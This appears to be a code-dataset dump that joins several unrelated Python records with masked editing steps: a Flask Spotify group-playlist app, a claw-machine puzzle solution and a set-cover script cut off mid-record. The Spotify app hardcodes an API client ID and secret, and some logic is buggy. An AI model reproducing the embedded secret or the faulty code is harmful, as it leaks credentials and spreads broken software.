sp = spotipy.Spotify(auth=session["token"])
playlist = sp.user_playlist_add_tracks(username, session["playlist_dict"]['id'], group_playlist) # add to the playlist
return render_template("index.html", playlist_url=session["playlist_dict"]['uri'])
token = util.prompt_for_user_token(username,'playlist-modify-public user-top-read', client_id=client_id,client_secret=client_secret,redirect_uri='http://127.0.0.1')
if token:
session["token"] = token
sp = spotipy.Spotify(auth=token)
track_dict = sp.current_user_top_tracks(limit=20, offset=0, time_range='medium_term') # get the hosts top tracks
tracks = list(map(lambda x: x['id'], track_dict['items']))
group_playlist = gen_playlist(tracks)
playlist_dict = sp.user_playlist_create(username, "Group Playlist")
playlist_id = playlist_dict['id']
user = playlist_dict['owner']
playlist = sp.user_playlist_add_tracks(username, playlist_id, group_playlist) # playlist is now populated
else:
print("Can't get token for " + username)
url = "https://open.spotify.com/embed?uri=" + playlist_dict['uri']
session["playlist_url"] = playlist_dict['uri']
return render_template("index.html", playlist_url=url)
@app.route("/login", methods=["GET", "POST"])
def login():
"""Log user in"""
# Forget any user_id
session.clear()
tracks = []
# User reached route via POST (as by submitting a form via POST)
if request.method == "POST":
# Ensure username was submitted
if request.form.get("username"):
session["username"] = request.form.get("username")
return redirect("/")
else:
return render_template("login.html")
# Returns a score of how similar two songs are. The lower the score, the lesser the differences.
def compare_score(song, total_features, features):
score=0.0
for key, value in features[0].items():
if isinstance(value, float):
score+=(value*1.0)/((1.0)*(total_features[key]+value))
return score
# Generates and intelligent playlist
def gen_playlist(track_ids):
client_credentials_manager = SpotifyClientCredentials(client_id, client_secret)
sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
total_features={"danceability":0.0, "energy":0.0, "key":0.0, "loudness":0.0, "mode":0.0, "speechiness":0.0, "acousticness":0.0, "instrumentalness":0.0, "liveness":0.0, "valence":0.0, "tempo":0.0}
song_counter=0.0
# Aggregating song features
for song in track_ids:
song_counter += 1
features = sp.audio_features(tracks=[song])
for key, value in features[0].items():
if isinstance(value, float):
total_features[key] += value
# Averaging out the songs features
if song_counter > 0:
for key, value in total_features.items():
value /= song_counter
# now we find all the songs close enough to the "average"
song_list=[]
for song in track_ids:
score = compare_score(song, total_features, sp.audio_features(tracks=[song]))
song_list.append((song, score))
song_list = sorted(song_list, key = lambda x: x[1])
# Getting the first 20 closest, best songs.
if len(song_list) > 20:
song_list = song_list[:20]
song_list = [song_list[i][0] for i in range(len(song_list))]
return song_list
|
flexible
|
{
"blob_id": "4f674b30c919c7ec72c11a8edd9692c91da7cb90",
"index": 9595,
"step-1": "<mask token>\n\n\n@app.route('/tracks', methods=['POST'])\ndef get_user_tracks():\n ids = json.loads(request.data)['ids']\n tracks.extend(ids)\n return 'success'\n\n\n@app.route('/')\n@login_required\ndef index():\n username = session['username']\n if session.get('token') and session.get('playlist_dict'):\n group_playlist = gen_playlist(tracks)\n sp = spotipy.Spotify(auth=session['token'])\n playlist = sp.user_playlist_add_tracks(username, session[\n 'playlist_dict']['id'], group_playlist)\n return render_template('index.html', playlist_url=session[\n 'playlist_dict']['uri'])\n token = util.prompt_for_user_token(username,\n 'playlist-modify-public user-top-read', client_id=client_id,\n client_secret=client_secret, redirect_uri='http://127.0.0.1')\n if token:\n session['token'] = token\n sp = spotipy.Spotify(auth=token)\n track_dict = sp.current_user_top_tracks(limit=20, offset=0,\n time_range='medium_term')\n tracks = list(map(lambda x: x['id'], track_dict['items']))\n group_playlist = gen_playlist(tracks)\n playlist_dict = sp.user_playlist_create(username, 'Group Playlist')\n playlist_id = playlist_dict['id']\n user = playlist_dict['owner']\n playlist = sp.user_playlist_add_tracks(username, playlist_id,\n group_playlist)\n else:\n print(\"Can't get token for \" + username)\n url = 'https://open.spotify.com/embed?uri=' + playlist_dict['uri']\n session['playlist_url'] = playlist_dict['uri']\n return render_template('index.html', playlist_url=url)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n \"\"\"Log user in\"\"\"\n session.clear()\n tracks = []\n if request.method == 'POST':\n if request.form.get('username'):\n session['username'] = request.form.get('username')\n return redirect('/')\n else:\n return render_template('login.html')\n\n\n<mask token>\n\n\ndef gen_playlist(track_ids):\n client_credentials_manager = SpotifyClientCredentials(client_id,\n client_secret)\n sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\n total_features = {'danceability': 0.0, 'energy': 0.0, 'key': 0.0,\n 'loudness': 0.0, 'mode': 0.0, 'speechiness': 0.0, 'acousticness': \n 0.0, 'instrumentalness': 0.0, 'liveness': 0.0, 'valence': 0.0,\n 'tempo': 0.0}\n song_counter = 0.0\n for song in track_ids:\n song_counter += 1\n features = sp.audio_features(tracks=[song])\n for key, value in features[0].items():\n if isinstance(value, float):\n total_features[key] += value\n if song_counter > 0:\n for key, value in total_features.items():\n value /= song_counter\n song_list = []\n for song in track_ids:\n score = compare_score(song, total_features, sp.audio_features(\n tracks=[song]))\n song_list.append((song, score))\n song_list = sorted(song_list, key=lambda x: x[1])\n if len(song_list) > 20:\n song_list = song_list[:20]\n song_list = [song_list[i][0] for i in range(len(song_list))]\n return song_list\n",
"step-2": "<mask token>\nif app.config['DEBUG']:\n\n @app.after_request\n def after_request(response):\n response.headers['Cache-Control'\n ] = 'no-cache, no-store, must-revalidate'\n response.headers['Expires'] = 0\n response.headers['Pragma'] = 'no-cache'\n return response\n<mask token>\nSession(app)\n<mask token>\n\n\n@app.route('/tracks', methods=['POST'])\ndef get_user_tracks():\n ids = json.loads(request.data)['ids']\n tracks.extend(ids)\n return 'success'\n\n\n@app.route('/')\n@login_required\ndef index():\n username = session['username']\n if session.get('token') and session.get('playlist_dict'):\n group_playlist = gen_playlist(tracks)\n sp = spotipy.Spotify(auth=session['token'])\n playlist = sp.user_playlist_add_tracks(username, session[\n 'playlist_dict']['id'], group_playlist)\n return render_template('index.html', playlist_url=session[\n 'playlist_dict']['uri'])\n token = util.prompt_for_user_token(username,\n 'playlist-modify-public user-top-read', client_id=client_id,\n client_secret=client_secret, redirect_uri='http://127.0.0.1')\n if token:\n session['token'] = token\n sp = spotipy.Spotify(auth=token)\n track_dict = sp.current_user_top_tracks(limit=20, offset=0,\n time_range='medium_term')\n tracks = list(map(lambda x: x['id'], track_dict['items']))\n group_playlist = gen_playlist(tracks)\n playlist_dict = sp.user_playlist_create(username, 'Group Playlist')\n playlist_id = playlist_dict['id']\n user = playlist_dict['owner']\n playlist = sp.user_playlist_add_tracks(username, playlist_id,\n group_playlist)\n else:\n print(\"Can't get token for \" + username)\n url = 'https://open.spotify.com/embed?uri=' + playlist_dict['uri']\n session['playlist_url'] = playlist_dict['uri']\n return render_template('index.html', playlist_url=url)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n \"\"\"Log user in\"\"\"\n session.clear()\n tracks = []\n if request.method == 'POST':\n if request.form.get('username'):\n session['username'] = request.form.get('username')\n return redirect('/')\n else:\n return render_template('login.html')\n\n\ndef compare_score(song, total_features, features):\n score = 0.0\n for key, value in features[0].items():\n if isinstance(value, float):\n score += value * 1.0 / (1.0 * (total_features[key] + value))\n return score\n\n\ndef gen_playlist(track_ids):\n client_credentials_manager = SpotifyClientCredentials(client_id,\n client_secret)\n sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\n total_features = {'danceability': 0.0, 'energy': 0.0, 'key': 0.0,\n 'loudness': 0.0, 'mode': 0.0, 'speechiness': 0.0, 'acousticness': \n 0.0, 'instrumentalness': 0.0, 'liveness': 0.0, 'valence': 0.0,\n 'tempo': 0.0}\n song_counter = 0.0\n for song in track_ids:\n song_counter += 1\n features = sp.audio_features(tracks=[song])\n for key, value in features[0].items():\n if isinstance(value, float):\n total_features[key] += value\n if song_counter > 0:\n for key, value in total_features.items():\n value /= song_counter\n song_list = []\n for song in track_ids:\n score = compare_score(song, total_features, sp.audio_features(\n tracks=[song]))\n song_list.append((song, score))\n song_list = sorted(song_list, key=lambda x: x[1])\n if len(song_list) > 20:\n song_list = song_list[:20]\n song_list = [song_list[i][0] for i in range(len(song_list))]\n return song_list\n",
"step-3": "<mask token>\napp = Flask(__name__)\nclient_id = '320606726d354474b5da64233babe82d'\nclient_secret = 'f2d15a0b056343cfa094525adfc45f27'\nif app.config['DEBUG']:\n\n @app.after_request\n def after_request(response):\n response.headers['Cache-Control'\n ] = 'no-cache, no-store, must-revalidate'\n response.headers['Expires'] = 0\n response.headers['Pragma'] = 'no-cache'\n return response\napp.config['SESSION_FILE_DIR'] = mkdtemp()\napp.config['SESSION_PERMANENT'] = False\napp.config['SESSION_TYPE'] = 'filesystem'\nSession(app)\ntracks = []\n\n\n@app.route('/tracks', methods=['POST'])\ndef get_user_tracks():\n ids = json.loads(request.data)['ids']\n tracks.extend(ids)\n return 'success'\n\n\n@app.route('/')\n@login_required\ndef index():\n username = session['username']\n if session.get('token') and session.get('playlist_dict'):\n group_playlist = gen_playlist(tracks)\n sp = spotipy.Spotify(auth=session['token'])\n playlist = sp.user_playlist_add_tracks(username, session[\n 'playlist_dict']['id'], group_playlist)\n return render_template('index.html', playlist_url=session[\n 'playlist_dict']['uri'])\n token = util.prompt_for_user_token(username,\n 'playlist-modify-public user-top-read', client_id=client_id,\n client_secret=client_secret, redirect_uri='http://127.0.0.1')\n if token:\n session['token'] = token\n sp = spotipy.Spotify(auth=token)\n track_dict = sp.current_user_top_tracks(limit=20, offset=0,\n time_range='medium_term')\n tracks = list(map(lambda x: x['id'], track_dict['items']))\n group_playlist = gen_playlist(tracks)\n playlist_dict = sp.user_playlist_create(username, 'Group Playlist')\n playlist_id = playlist_dict['id']\n user = playlist_dict['owner']\n playlist = sp.user_playlist_add_tracks(username, playlist_id,\n group_playlist)\n else:\n print(\"Can't get token for \" + username)\n url = 'https://open.spotify.com/embed?uri=' + playlist_dict['uri']\n session['playlist_url'] = playlist_dict['uri']\n return render_template('index.html', playlist_url=url)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n \"\"\"Log user in\"\"\"\n session.clear()\n tracks = []\n if request.method == 'POST':\n if request.form.get('username'):\n session['username'] = request.form.get('username')\n return redirect('/')\n else:\n return render_template('login.html')\n\n\ndef compare_score(song, total_features, features):\n score = 0.0\n for key, value in features[0].items():\n if isinstance(value, float):\n score += value * 1.0 / (1.0 * (total_features[key] + value))\n return score\n\n\ndef gen_playlist(track_ids):\n client_credentials_manager = SpotifyClientCredentials(client_id,\n client_secret)\n sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\n total_features = {'danceability': 0.0, 'energy': 0.0, 'key': 0.0,\n 'loudness': 0.0, 'mode': 0.0, 'speechiness': 0.0, 'acousticness': \n 0.0, 'instrumentalness': 0.0, 'liveness': 0.0, 'valence': 0.0,\n 'tempo': 0.0}\n song_counter = 0.0\n for song in track_ids:\n song_counter += 1\n features = sp.audio_features(tracks=[song])\n for key, value in features[0].items():\n if isinstance(value, float):\n total_features[key] += value\n if song_counter > 0:\n for key, value in total_features.items():\n value /= song_counter\n song_list = []\n for song in track_ids:\n score = compare_score(song, total_features, sp.audio_features(\n tracks=[song]))\n song_list.append((song, score))\n song_list = sorted(song_list, key=lambda x: x[1])\n if len(song_list) > 20:\n song_list = song_list[:20]\n song_list = [song_list[i][0] for i in range(len(song_list))]\n return song_list\n",
"step-4": "import json\nimport spotipy\nimport spotipy.util as util\nfrom spotipy.oauth2 import SpotifyClientCredentials\nfrom flask import abort, Flask, flash, redirect, render_template, request, session\nfrom flask_session import Session\nfrom tempfile import mkdtemp\nfrom helpers import login_required\napp = Flask(__name__)\nclient_id = '320606726d354474b5da64233babe82d'\nclient_secret = 'f2d15a0b056343cfa094525adfc45f27'\nif app.config['DEBUG']:\n\n @app.after_request\n def after_request(response):\n response.headers['Cache-Control'\n ] = 'no-cache, no-store, must-revalidate'\n response.headers['Expires'] = 0\n response.headers['Pragma'] = 'no-cache'\n return response\napp.config['SESSION_FILE_DIR'] = mkdtemp()\napp.config['SESSION_PERMANENT'] = False\napp.config['SESSION_TYPE'] = 'filesystem'\nSession(app)\ntracks = []\n\n\n@app.route('/tracks', methods=['POST'])\ndef get_user_tracks():\n ids = json.loads(request.data)['ids']\n tracks.extend(ids)\n return 'success'\n\n\n@app.route('/')\n@login_required\ndef index():\n username = session['username']\n if session.get('token') and session.get('playlist_dict'):\n group_playlist = gen_playlist(tracks)\n sp = spotipy.Spotify(auth=session['token'])\n playlist = sp.user_playlist_add_tracks(username, session[\n 'playlist_dict']['id'], group_playlist)\n return render_template('index.html', playlist_url=session[\n 'playlist_dict']['uri'])\n token = util.prompt_for_user_token(username,\n 'playlist-modify-public user-top-read', client_id=client_id,\n client_secret=client_secret, redirect_uri='http://127.0.0.1')\n if token:\n session['token'] = token\n sp = spotipy.Spotify(auth=token)\n track_dict = sp.current_user_top_tracks(limit=20, offset=0,\n time_range='medium_term')\n tracks = list(map(lambda x: x['id'], track_dict['items']))\n group_playlist = gen_playlist(tracks)\n playlist_dict = sp.user_playlist_create(username, 'Group Playlist')\n playlist_id = playlist_dict['id']\n user = playlist_dict['owner']\n playlist = sp.user_playlist_add_tracks(username, playlist_id,\n group_playlist)\n else:\n print(\"Can't get token for \" + username)\n url = 'https://open.spotify.com/embed?uri=' + playlist_dict['uri']\n session['playlist_url'] = playlist_dict['uri']\n return render_template('index.html', playlist_url=url)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n \"\"\"Log user in\"\"\"\n session.clear()\n tracks = []\n if request.method == 'POST':\n if request.form.get('username'):\n session['username'] = request.form.get('username')\n return redirect('/')\n else:\n return render_template('login.html')\n\n\ndef compare_score(song, total_features, features):\n score = 0.0\n for key, value in features[0].items():\n if isinstance(value, float):\n score += value * 1.0 / (1.0 * (total_features[key] + value))\n return score\n\n\ndef gen_playlist(track_ids):\n client_credentials_manager = SpotifyClientCredentials(client_id,\n client_secret)\n sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\n total_features = {'danceability': 0.0, 'energy': 0.0, 'key': 0.0,\n 'loudness': 0.0, 'mode': 0.0, 'speechiness': 0.0, 'acousticness': \n 0.0, 'instrumentalness': 0.0, 'liveness': 0.0, 'valence': 0.0,\n 'tempo': 0.0}\n song_counter = 0.0\n for song in track_ids:\n song_counter += 1\n features = sp.audio_features(tracks=[song])\n for key, value in features[0].items():\n if isinstance(value, float):\n total_features[key] += value\n if song_counter > 0:\n for key, value in total_features.items():\n value /= song_counter\n song_list = []\n for song in track_ids:\n score = compare_score(song, total_features, sp.audio_features(\n tracks=[song]))\n song_list.append((song, score))\n song_list = sorted(song_list, key=lambda x: x[1])\n if len(song_list) > 20:\n song_list = song_list[:20]\n song_list = [song_list[i][0] for i in range(len(song_list))]\n return song_list\n",
"step-5": "import json\nimport spotipy\nimport spotipy.util as util\nfrom spotipy.oauth2 import SpotifyClientCredentials\nfrom flask import abort, Flask, flash, redirect, render_template, request, session\nfrom flask_session import Session\nfrom tempfile import mkdtemp\n\nfrom helpers import login_required\n\n# Configure application\napp = Flask(__name__)\n\nclient_id = '320606726d354474b5da64233babe82d'\nclient_secret = 'f2d15a0b056343cfa094525adfc45f27'\n\n# Ensure responses aren't cached\nif app.config[\"DEBUG\"]:\n @app.after_request\n def after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n# Configure session to use filesystem (instead of signed cookies)\napp.config[\"SESSION_FILE_DIR\"] = mkdtemp()\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# list of track ids gathered from users\ntracks = []\n\n# retrieve top tracks from newly connected user\n@app.route(\"/tracks\", methods = [\"POST\"])\ndef get_user_tracks():\n ids = json.loads(request.data)['ids']\n tracks.extend(ids)\n\n return 'success'\n\n# Main page. Runs playlist generation and displays the embedded playlist.\n@app.route(\"/\")\n@login_required\ndef index():\n username = session[\"username\"]\n\n # host has already logged in and playlist is already made\n if session.get(\"token\") and session.get(\"playlist_dict\"):\n group_playlist = gen_playlist(tracks)\n sp = spotipy.Spotify(auth=session[\"token\"])\n playlist = sp.user_playlist_add_tracks(username, session[\"playlist_dict\"]['id'], group_playlist) # add to the playlist\n return render_template(\"index.html\", playlist_url=session[\"playlist_dict\"]['uri'])\n\n token = util.prompt_for_user_token(username,'playlist-modify-public user-top-read', client_id=client_id,client_secret=client_secret,redirect_uri='http://127.0.0.1')\n if token:\n session[\"token\"] = token\n sp = spotipy.Spotify(auth=token)\n track_dict = sp.current_user_top_tracks(limit=20, offset=0, time_range='medium_term') # get the hosts top tracks\n tracks = list(map(lambda x: x['id'], track_dict['items']))\n\n group_playlist = gen_playlist(tracks)\n\n playlist_dict = sp.user_playlist_create(username, \"Group Playlist\")\n playlist_id = playlist_dict['id']\n user = playlist_dict['owner']\n\n playlist = sp.user_playlist_add_tracks(username, playlist_id, group_playlist) # playlist is now populated\n else:\n print(\"Can't get token for \" + username)\n\n url = \"https://open.spotify.com/embed?uri=\" + playlist_dict['uri']\n session[\"playlist_url\"] = playlist_dict['uri']\n return render_template(\"index.html\", playlist_url=url)\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n \"\"\"Log user in\"\"\"\n # Forget any user_id\n session.clear()\n tracks = []\n\n # User reached route via POST (as by submitting a form via POST)\n if request.method == \"POST\":\n # Ensure username was submitted\n if request.form.get(\"username\"):\n session[\"username\"] = request.form.get(\"username\")\n return redirect(\"/\")\n\n else:\n return render_template(\"login.html\")\n\n# Returns a score of how similar two songs are. The lower the score, the lesser the differences.\ndef compare_score(song, total_features, features):\n score=0.0\n for key, value in features[0].items():\n if isinstance(value, float):\n score+=(value*1.0)/((1.0)*(total_features[key]+value))\n return score\n\n# Generates and intelligent playlist\ndef gen_playlist(track_ids):\n client_credentials_manager = SpotifyClientCredentials(client_id, client_secret)\n sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\n total_features={\"danceability\":0.0, \"energy\":0.0, \"key\":0.0, \"loudness\":0.0, \"mode\":0.0, \"speechiness\":0.0, \"acousticness\":0.0, \"instrumentalness\":0.0, \"liveness\":0.0, \"valence\":0.0, \"tempo\":0.0}\n song_counter=0.0\n \n # Aggregating song features\n for song in track_ids:\n song_counter += 1\n features = sp.audio_features(tracks=[song])\n for key, value in features[0].items():\n if isinstance(value, float):\n total_features[key] += value\n \n # Averaging out the songs features\n if song_counter > 0:\n for key, value in total_features.items():\n value /= song_counter\n\n # now we find all the songs close enough to the \"average\"\n song_list=[]\n for song in track_ids:\n score = compare_score(song, total_features, sp.audio_features(tracks=[song]))\n song_list.append((song, score))\n song_list = sorted(song_list, key = lambda x: x[1])\n\n # Getting the first 20 closest, best songs.\n if len(song_list) > 20:\n song_list = song_list[:20]\n song_list = [song_list[i][0] for i in range(len(song_list))]\n return song_list\n\n\n\n\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
# 예시 입력값
board = [[0,0,0,0,0],[0,0,1,0,3],[0,2,5,0,1],[4,2,4,4,2],[3,5,1,3,1]]
moves = [1,5,3,5,1,2,1,4]
# 로직
resultList = []
count = 0
for nth in moves:
for i in range(len(board)):
selected = board[i][nth - 1]
if selected == 0:
continue
else:
# 인형을 resultList에 넣고
resultList.append(selected)
# resultList를 탐색하여 같은 인형이 있는지 보기
lenR = len(resultList)
if lenR > 1:
if resultList[lenR - 2] == resultList[lenR - 1]:
del resultList[lenR - 2:]
count += 2
# 뽑힌 인형은 board에서 사라짐
board[i][nth - 1] = 0
break
# print(resultList)
print(count)
|
normal
|
{
"blob_id": "18e032b7ff7ae9d3f5fecc86f63d12f4da7b8067",
"index": 6180,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor nth in moves:\n for i in range(len(board)):\n selected = board[i][nth - 1]\n if selected == 0:\n continue\n else:\n resultList.append(selected)\n lenR = len(resultList)\n if lenR > 1:\n if resultList[lenR - 2] == resultList[lenR - 1]:\n del resultList[lenR - 2:]\n count += 2\n board[i][nth - 1] = 0\n break\nprint(count)\n",
"step-3": "board = [[0, 0, 0, 0, 0], [0, 0, 1, 0, 3], [0, 2, 5, 0, 1], [4, 2, 4, 4, 2],\n [3, 5, 1, 3, 1]]\nmoves = [1, 5, 3, 5, 1, 2, 1, 4]\nresultList = []\ncount = 0\nfor nth in moves:\n for i in range(len(board)):\n selected = board[i][nth - 1]\n if selected == 0:\n continue\n else:\n resultList.append(selected)\n lenR = len(resultList)\n if lenR > 1:\n if resultList[lenR - 2] == resultList[lenR - 1]:\n del resultList[lenR - 2:]\n count += 2\n board[i][nth - 1] = 0\n break\nprint(count)\n",
"step-4": "# 예시 입력값\nboard = [[0,0,0,0,0],[0,0,1,0,3],[0,2,5,0,1],[4,2,4,4,2],[3,5,1,3,1]]\nmoves = [1,5,3,5,1,2,1,4]\n\n# 로직\nresultList = []\ncount = 0\n\nfor nth in moves:\n for i in range(len(board)):\n selected = board[i][nth - 1]\n if selected == 0:\n continue\n else:\n # 인형을 resultList에 넣고\n resultList.append(selected)\n # resultList를 탐색하여 같은 인형이 있는지 보기\n lenR = len(resultList)\n if lenR > 1:\n if resultList[lenR - 2] == resultList[lenR - 1]:\n del resultList[lenR - 2:]\n count += 2\n\n # 뽑힌 인형은 board에서 사라짐\n board[i][nth - 1] = 0\n break\n\n# print(resultList)\nprint(count)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
class subset:
def __init__(self, weight, itemSet, size, setNum):
self.weight = weight
self.itemSet = itemSet
self.size = size
self.setNum = setNum
def findCover(base, arr):
uniq = [] #array that can be union
uni = [] #array has been unionized w/ base
if len(base.itemSet) == rangeOfVal:
# print("COVER:", base.itemSet)
return base
remain = rangeOfVal
# Search through arr to find all potential subsets
for i in arr:
# print("compare: ", i.itemSet)
if base.itemSet.isdisjoint(i.itemSet) == True:
# Unique array
uniq.append(i)
remain = remain - len(i.itemSet)
# print("uniq: ", len(uniq))
addedSub = subset(base.weight + i.weight,
base.itemSet.union(i.itemSet),
base.size + i.size,
str(base.setNum) + " " + str(i.setNum))
# Union array
uni.append(addedSub)
print("added:", addedSub.itemSet)
if addedSub.size == rangeOfVal:
# print("COVER:", addedSub.itemSet)
return addedSub
print()
for j in uni:
# print(j.setNum)
if remain == len(base.itemSet):
findCover(j, uniq)
# print("_____________________________NONE_______________________________")
return
# fileName="./inputs/input_group115.txt"
fileName="Input_attempt3.txt"
f=open(fileName, "r")
rangeOfVal=int(f.readline()) # n
numOfSub=int(f.readline()) # m
num=0
minWeight=500001
minCover=[]
subsetList=[]
# Loop to read through file and set up the data structures
# to hold all the values
while True:
itemSet=f.readline()
if itemSet == "":
break
else:
weight=int(f.readline())
arrItems=itemSet.split(" ")
i=0
# Convert each item into an int and delete any \n
for item in arrItems:
if item != "\n":
arrItems[i]=int(item)
i += 1
else:
arrItems.remove("\n")
arrItems.sort()
s=subset(weight, set(arrItems), len(arrItems), num)
subsetList.append(s)
num += 1
# print("---------------------------------------------")
# for s in subsetList:
# print(s.itemSet)
# print("---------------------------------------------")
covers = []
inc = 1
for base in subsetList:
# print()
print("base:", base.setNum)
o = findCover(base, subsetList[inc:len(subsetList)])
if o != None:
print("here!")
covers.append(o)
# print(o.setNum)
inc += 1
for w in covers:
if w.weight < minWeight:
minWeight = w.weight
# if type(s.setNum) == int: continue
# else: minCover = (s.setNum).split(" ").sort()
minCover = w.setNum
print(minWeight)
print(minCover)
# for cov in covers:
# print(cov.itemSet)
# #
|
normal
|
{
"blob_id": "b865c37623f405f67592d1eabc620d11ff87827e",
"index": 3378,
"step-1": "class subset:\n <mask token>\n\n\n<mask token>\n",
"step-2": "class subset:\n\n def __init__(self, weight, itemSet, size, setNum):\n self.weight = weight\n self.itemSet = itemSet\n self.size = size\n self.setNum = setNum\n\n\ndef findCover(base, arr):\n uniq = []\n uni = []\n if len(base.itemSet) == rangeOfVal:\n return base\n remain = rangeOfVal\n for i in arr:\n if base.itemSet.isdisjoint(i.itemSet) == True:\n uniq.append(i)\n remain = remain - len(i.itemSet)\n addedSub = subset(base.weight + i.weight, base.itemSet.union(i.\n itemSet), base.size + i.size, str(base.setNum) + ' ' + str(\n i.setNum))\n uni.append(addedSub)\n print('added:', addedSub.itemSet)\n if addedSub.size == rangeOfVal:\n return addedSub\n print()\n for j in uni:\n if remain == len(base.itemSet):\n findCover(j, uniq)\n return\n\n\n<mask token>\n",
"step-3": "class subset:\n\n def __init__(self, weight, itemSet, size, setNum):\n self.weight = weight\n self.itemSet = itemSet\n self.size = size\n self.setNum = setNum\n\n\ndef findCover(base, arr):\n uniq = []\n uni = []\n if len(base.itemSet) == rangeOfVal:\n return base\n remain = rangeOfVal\n for i in arr:\n if base.itemSet.isdisjoint(i.itemSet) == True:\n uniq.append(i)\n remain = remain - len(i.itemSet)\n addedSub = subset(base.weight + i.weight, base.itemSet.union(i.\n itemSet), base.size + i.size, str(base.setNum) + ' ' + str(\n i.setNum))\n uni.append(addedSub)\n print('added:', addedSub.itemSet)\n if addedSub.size == rangeOfVal:\n return addedSub\n print()\n for j in uni:\n if remain == len(base.itemSet):\n findCover(j, uniq)\n return\n\n\n<mask token>\nwhile True:\n itemSet = f.readline()\n if itemSet == '':\n break\n else:\n weight = int(f.readline())\n arrItems = itemSet.split(' ')\n i = 0\n for item in arrItems:\n if item != '\\n':\n arrItems[i] = int(item)\n i += 1\n else:\n arrItems.remove('\\n')\n arrItems.sort()\n s = subset(weight, set(arrItems), len(arrItems), num)\n subsetList.append(s)\n num += 1\n<mask token>\nfor base in subsetList:\n print('base:', base.setNum)\n o = findCover(base, subsetList[inc:len(subsetList)])\n if o != None:\n print('here!')\n covers.append(o)\n inc += 1\nfor w in covers:\n if w.weight < minWeight:\n minWeight = w.weight\n minCover = w.setNum\nprint(minWeight)\nprint(minCover)\n",
"step-4": "class subset:\n\n def __init__(self, weight, itemSet, size, setNum):\n self.weight = weight\n self.itemSet = itemSet\n self.size = size\n self.setNum = setNum\n\n\ndef findCover(base, arr):\n uniq = []\n uni = []\n if len(base.itemSet) == rangeOfVal:\n return base\n remain = rangeOfVal\n for i in arr:\n if base.itemSet.isdisjoint(i.itemSet) == True:\n uniq.append(i)\n remain = remain - len(i.itemSet)\n addedSub = subset(base.weight + i.weight, base.itemSet.union(i.\n itemSet), base.size + i.size, str(base.setNum) + ' ' + str(\n i.setNum))\n uni.append(addedSub)\n print('added:', addedSub.itemSet)\n if addedSub.size == rangeOfVal:\n return addedSub\n print()\n for j in uni:\n if remain == len(base.itemSet):\n findCover(j, uniq)\n return\n\n\nfileName = 'Input_attempt3.txt'\nf = open(fileName, 'r')\nrangeOfVal = int(f.readline())\nnumOfSub = int(f.readline())\nnum = 0\nminWeight = 500001\nminCover = []\nsubsetList = []\nwhile True:\n itemSet = f.readline()\n if itemSet == '':\n break\n else:\n weight = int(f.readline())\n arrItems = itemSet.split(' ')\n i = 0\n for item in arrItems:\n if item != '\\n':\n arrItems[i] = int(item)\n i += 1\n else:\n arrItems.remove('\\n')\n arrItems.sort()\n s = subset(weight, set(arrItems), len(arrItems), num)\n subsetList.append(s)\n num += 1\ncovers = []\ninc = 1\nfor base in subsetList:\n print('base:', base.setNum)\n o = findCover(base, subsetList[inc:len(subsetList)])\n if o != None:\n print('here!')\n covers.append(o)\n inc += 1\nfor w in covers:\n if w.weight < minWeight:\n minWeight = w.weight\n minCover = w.setNum\nprint(minWeight)\nprint(minCover)\n",
"step-5": "class subset:\n\tdef __init__(self, weight, itemSet, size, setNum):\n\t\tself.weight = weight\n\t\tself.itemSet = itemSet\n\t\tself.size = size\n\t\tself.setNum = setNum\n\n\ndef findCover(base, arr):\n\tuniq = [] #array that can be union\n\tuni = [] #array has been unionized w/ base\n\tif len(base.itemSet) == rangeOfVal:\n\t\t# print(\"COVER:\", base.itemSet)\n\t\treturn base\n\tremain = rangeOfVal\n\t# Search through arr to find all potential subsets\n\tfor i in arr:\n\t\t# print(\"compare: \", i.itemSet)\n\t\tif base.itemSet.isdisjoint(i.itemSet) == True:\n\t\t\t# Unique array\n\t\t\tuniq.append(i)\n\t\t\tremain = remain - len(i.itemSet)\n\t\t\t# print(\"uniq: \", len(uniq))\n\t\t\taddedSub = subset(base.weight + i.weight,\n\t\t\t\t\t\t\tbase.itemSet.union(i.itemSet),\n\t\t\t\t\t\t\tbase.size + i.size,\n\t\t\t\t\t\t\tstr(base.setNum) + \" \" + str(i.setNum))\n\t\t\t# Union array\n\t\t\tuni.append(addedSub)\n\t\t\tprint(\"added:\", addedSub.itemSet)\n\t\t\tif addedSub.size == rangeOfVal:\n\t\t\t\t# print(\"COVER:\", addedSub.itemSet)\n\t\t\t\treturn addedSub\n\tprint()\n\tfor j in uni:\n\t\t# print(j.setNum)\n\t\tif remain == len(base.itemSet):\n\t\t\tfindCover(j, uniq)\n\t# print(\"_____________________________NONE_______________________________\")\t\t \n\treturn\n\n\n\n# fileName=\"./inputs/input_group115.txt\"\nfileName=\"Input_attempt3.txt\"\nf=open(fileName, \"r\")\n\nrangeOfVal=int(f.readline()) # n\nnumOfSub=int(f.readline()) # m\nnum=0\nminWeight=500001\nminCover=[]\nsubsetList=[]\n# Loop to read through file and set up the data structures\n# to hold all the values\nwhile True:\n\titemSet=f.readline()\n\tif itemSet == \"\":\n\t\tbreak\n\telse:\n\t\tweight=int(f.readline())\n\t\tarrItems=itemSet.split(\" \")\n\t\ti=0\n\t\t# Convert each item into an int and delete any \\n\n\t\tfor item in arrItems:\n\t\t\tif item != \"\\n\":\n\t\t\t\tarrItems[i]=int(item)\n\t\t\t\ti += 